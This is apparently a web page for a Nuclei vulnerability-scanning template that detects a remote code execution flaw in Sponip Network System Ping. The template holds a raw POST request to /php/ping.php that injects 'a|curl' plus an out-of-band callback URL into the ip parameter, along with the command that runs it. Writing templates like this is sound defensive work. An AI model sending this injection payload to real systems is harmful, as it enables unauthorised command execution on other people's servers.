Skip to content

Sponip Network System Ping - Remote Code Execution

ID: sponip-network-system-ping-rce

Severity: critical

Author: pikpikcu

Tags: sponip,rce,oast

Sponip Network System Ping is susceptible to remote code execution.

id: sponip-network-system-ping-rce
info:
name: Sponip Network System Ping - Remote Code Execution
author: pikpikcu
severity: critical
description: |
Sponip Network System Ping is susceptible to remote code execution.
reference:
- https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247486018&idx=1&sn=d744907475a4ea9ebeb26338c735e3e9
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cwe-id: CWE-77
metadata:
max-request: 1
tags: sponip,rce,oast
http:
- raw:
- |
POST /php/ping.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
sondata[ip]=a|curl {{interactsh-url}}&jsondata[type]=1
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
name: http
words:
- "http"
- type: word
part: interactsh_request
words:
- "User-Agent: curl"
# digest: 4a0a004730450220189d245102a723adc1afa29d56eca855a3ad864f9efe4cd6a9c49517fb0b671a022100c41098f806d713eabe79c0d0ad2f4150bc66d4b6d710401ca7b086ac3ed91757:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/other/sponip-network-system-ping-rce.yaml"

View on Github